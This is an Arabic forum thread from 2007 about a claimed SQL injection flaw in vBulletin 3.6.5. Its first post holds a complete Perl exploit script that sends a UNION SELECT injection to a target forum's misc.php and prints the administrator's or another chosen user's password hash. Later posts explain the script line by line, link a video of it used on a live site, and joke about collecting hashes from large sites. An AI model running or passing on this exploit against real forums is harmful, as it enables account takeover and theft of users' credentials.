مشاركتك هنا تمثل للجميع أخلاقك وثقافتك تذكر هذا جيدا قبل نشرها في موضوع جديد

ياخذ ومايعطي · #1 (**permalink**) 04-19-2007, 12:16 AM

vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

والله ياشباب يوم شفت التطبيق على الموقع الرئيسي
للمنتديات هني تذكرت المنتديات العربية
انا ماحب اقول انوا الثغره تم كشفها بالاول من قبل سيوف الاسلام وبعدين تم الكشف عنها وفضحها فريق تركي

المهم
اعطيكم المختصر

اقتباس:

المشاركة الأصلية كتبت بواسطة SnIpEr_SyRiA

vbulletin v3.6.5 Remote Injection Exploit النجدة للمنتديات العربية

مرحبا
جايبلكم ثغرة اليوم نص المواقع مصاب بيهة
ثغرة تعطيك بسورد المشرف العام او المدير حسب رقم الاعضوية يلي انت تطلبو
لتحميل الدرس الدرس فيديو والحمد الله مني
ويرجا عند النقل نقل المصدر وكاتب الموضوع
للتحميل اكبيس هونا
تحياتي
sniper_syria
القناص سوري
h-.0.-f@hotmail.com

------------------------------------------------
كااتب الرد shap7_haCker
[

كود PHP:

  #!/usr/bin/perl

 
use IO::Socket;

 
print q{

######################################################

# DeluxeBB Remote SQL Injection Exploit #

# vbulletin Remote SQL Injection Exploit #

# // SekoMirza // Turkish Hackerz #

######################################################

};

تحياتى

|11| 

 
if (!$ARGV[2]) {

 
print q{ 

Usage: perl dbbxpl.pl host /directory/ victim_userid 

 
perl dbbxpl.pl www.somesite.com /forum/ 1

 
};

 
}

 
$server = $ARGV[0];

$dir = $ARGV[1];

$user = $ARGV[2];

$myuser = $ARGV[3];

$mypass = $ARGV[4];

$myid = $ARGV[5];

 
print "-----------------------------------------------------------------------

-------------------------\r\n";

print "[>] SERVER: $server\r\n";

print "[>] DIR: $dir\r\n";

print "[>] USERID: $user\r\n";

print "-----------------------------------------------------------------------

-------------------------\r\n\r\n";

 
$server =~ s/(http:\/\/)//eg;

 
$path = $dir;

$path .=

 
"misc.php?sub=profile&*_**_**_**_*=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0

,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

 
20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...\r\n";

 
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

 
print "[+] CONNECTED\r\n";

print "[~] SENDING QUERY...\r\n";

print $socket "GET $path HTTP/1.1\r\n";

print $socket "Host: $server\r\n";

print $socket "Accept: */*\r\n";

print $socket "Connection: close\r\n\r\n";

print "[+] DONE!\r\n\r\n";

 
print "--[ REPORT ]-----------------------------------------------------------------------

-------------\r\n";

while ($answer = <$socket>)

{

 
if ($answer =~/(\w{32})/)

{

 
if ($1 ne 0) {

print "Password Hash is: ".$1."\r\n";

print "-----------------------------------------------------------------------

---------------\r\n";

 
}

exit();

}

 
}

print "-----------------------------------------------------------------------

-------------------------\r\n";

 
#########################################################

#Shoutz: #

# #

# My Sweet -> Caramel #

# For Mp3s -> Hypn0sis #

# For Support -> [WwW.StarHack.Org] #

# My Bro -> PhantomOrchid #

# My Preceptor -> Earnk Kazno #

#########################################################

]

اذا عرف السبب بطل العجب والله مشكله جاري حل المشكله والترقيع معه انو الحمدلله ماخذ احتياط مسبق ؟؟

رابط الموضوع
سيوف الاسلام Islam swords

منتديات مدرسة المشاغبين - تطوير و صيانة المنتديات vBulletin

ياخذ ومايعطي · #2 (**permalink**) 04-19-2007, 12:59 AM

نعود الليكم لان جون يمكن اصاب بالجنون
اللمهم ماعلينا
ابو عمر ولا هنت ياقلبي اذا نزلت النسخه 3.6.6
هذي الهاكات اللي نبيها

2 ----> استبدال رابط الموضوع إلى عنوانه
3 ----> منع المشرف من إعطاء إنذار خارج قسمه
4 ----> آخر عشر رسائل خاصة في لوحة التحكم
5 ----> أستبدال أسم كاتب الموضوع بأسم عضو آخر
6 ---->المسمى الاضافي للعضو او الوصف للعضو
7 ----> البنرات العشوائية للمنتدى تحكم كامل وتقرير عن الضغطات والزيارات للبنر محدث
8 ----> تصغير الصور تلقائيا بمواصفات خياليه
9 ----> التحكم بخيارات التوقيع المتقدم مثل الأبعاد والأسطر والصور والحجم محدث

12----> منع إرسال روابط عن طريق الرسائل الخاصة
14----> تحويل الوقت إلى صباحا مساء والتاريخ الهجري
15----> الرسائل الخاصة الإدارية الأوتوماتيكية عند نقل حذف تثبيت أي موضوع
16----> منع استخدام الرسائل الخاصة إلا بعد عدد معين
د
18----> هاك أفضل المشاركين خلال الشهر
19----> شريط متحرك بالأعلى بلوحة تحكم بالسرعة واللون والحجم وغيره

21----> هاك كشف الرسائل الخاصة مميزات رائعة بتحكم
23----> المتواجدون اليوم بمميزات رهيبه

27----> هاك الدخول بأسماء الأعضاء للمدير بدون رقم سري
28----> جعل الموضوع قديما أو وضعه في الأعلى
29----> التأكد من وجود الموضوع عند كتابته
30----> عدم السماح للعضو بتقييم موضوعه
31----> ألوان رتب المجموعات
32----> تحديد الايبي الحقيقي
33----> إعلانات في الصفحة الرئيسية بتحكم مميز
34----> فصل المواضيع العادية عن المثبتة المطور
35----> ضغط وتسريع تصفح المنتدى
36----> منتج تعطيل التوقيع في الأقسام مثل الإسلامي وغيره
37----> منع الحذف الفعلي للمشرفين
38----> إحصائيات حركة المشرفين

42----> أيقونه أو صوره لكل قسم >>>> يحتاج تعديل قوالب
43----> الشريط المرن بتحكم كامل >>>> يحتاج تعديل قوالب
44----> عرض بيانات عن الـ Ip بالتفصيل >>>> يحتاج تعديل قوالب
45----> الصندوق الماسي >>>> يحتاج تعديل قوالب
46----> الاوسمه الإصدار الجديد المميز >>>> يحتاج تعديل قوالب

48----> من مواضيع الكاتب في البوست بت >>>> يحتاج تعديل قوالب
49----> بنر لكل مجلس بشكل مستقل عن بقية المجالس >>>> يحتاج تعديل قوالب

50----> إحصائية المنتدى المنسقة (( مثل مجموع المسجلين والمتصلين والمواضيع والمشاركات )) >>>> يحتاج تعديل قوالب
52----> انشط عضو هذا اليوم >>>> يحتاج تعديل قوالب
57----> عرض استفتاء معين فى الرئيسية جديد
59----> حذف الرسائل الخاصة أقدم من X يوم جديد
62----> بداية افتتاح المنتدى >>>> يحتاج تعديل قوالب جديد

64----> حذف البريد من المواضيع ومن الرسائل الخاصة للنسخة جديد
65
66----> مراسل الأعضاء الغير متفاعلين جديد
67----> منتج لوحة الشرف ( المتميزين ) >>>> يحتاج تعديل قوالب جديد اختر مابين الهاك والهاك رقم 50 صندوق التميزد
69----> حل مشكلة عدم ظهور اسم المرفق باللغة العربية جديد
70----> الانتقال التلقائي للرسائل البريدية جدي

والله ابو عمر هذول اكفايه لان الباقي يسبب ارهاق للمنتدي وصاحب المنتدي ومشكور على النسخ الاكثر من رائعه
اللي تنزل من ايادي بارك الله فيها

HaRD-2-GeT · #3 (**permalink**) 04-19-2007, 01:40 AM

يعطيك العافية ,, على المعلومة

وهذا رابط الموضوع في الشركة

Vbulletin 3.6.5 Sql Injection ! [misc.php] Apr 13 2007 07:01PM - vBulletin Community Forum - Project Tools

الموضوع اللي موجود في الشركة ,, يقول ,, ان هذي مو ثغرة ,, لان السكربت يبحث عن الهاش اللي موجود في الصفحة

ويقول أيضا انه يراسل الموقع يشيلونها من الثغرات

,,,

على فكرة ,, md5 الهاش ,, اذا كان مكون من رموز ,, وحروف واكثر من 15 حرف ,,

فما أعتقد , إن في خطورة , لانه مستحيل فك تشفيره

حتى لو كان السالت موجود

,,, ولا أنا غلطان

ياخذ ومايعطي · #4 (**permalink**) 04-19-2007, 02:36 AM

هو معاك حق في الكلام
وهم جون معاه حق بس المشكله خليتها تتعدا جون وتدعى الادعاءات كلها طيب هاللحين

اللمهم طريقة العمل شوي وشروحات معاها
يقوم بلتصال بملف
"tcp",
على بورت
80
اذا استجاب ملف tcp
لا يضهر لك هذيه الرسالة
"[-] CONNECTION FAILED
اذا تم بستجابة
تضهر لك البسورد
print "[+] CONNECTED\r\n";
الاتصال
print "[~] SENDING QUERY...\r\n";
تجربة سريعة
print $socket "GET $path HTTP/1.1\r\n";
سحب عن طريق الـpath$
print $socket "Host: $server\r\n";
رابط الموقع
print $socket "Accept: */*\r\n";
تم الموافق االدخول
print $socket "Connection: close\r\n\r\n";
لم يتم موافقة
print "[+] DONE!\r\n\r\n";
المشكله تكمن انها نفس الحظ ماعرف ماهي البيئه الحاويه اللها

نتابع عشان يروح ينكر الثغره عدل في السكيورتي
حطيت رابط فيديوا مطبق على منتداه خخخخخخخخخخخخخ
بس الصراحه تحصل على الهاش
وبعد ماتشوف الفيديو راح تحكم من كلامه صح shap7_haCker معه SnIpEr_SyRiA
او كلام جون اللمهم
هذا رابط الفيديوا مباشر يدعم كل شي
www.blackrebels.de/mr/vb-SqL.rar

يالله شوفوا ورد اللي خبر ولاتواخذوني على مكان رفع الملف بس تعرف موقع وطاير من امله نستفيد منه شوي

ياخذ ومايعطي · #5 (**permalink**) 04-20-2007, 03:44 AM

ايه والله مشكله مشاهدات على الفاضي محدا شاف الحل طيب راح اخلي الموضوع هذا احط هاشات اكبر المواقع اريح هههههههههههههههههههههههههههههههه

استضافة مواقع	معنى كلمة	رسائل مسجات	دردشة شات	افلام × فيلم
فلاش اسلامي	الثقافة الجنسية في عالم الجنس	صور جديدة		توبيكات × توبيك
ابتسامات خلفيات	العاب جديدة	دليل مواقع	-	مركز تحميل ملفات
بطاقات كروت	جوال موبايل	جافا java	قصص روايات	-
كتب الكترونية	ماسنجر في مسنجر	-	-	العاب بنات للبنات فقط 2010

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طريقة عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري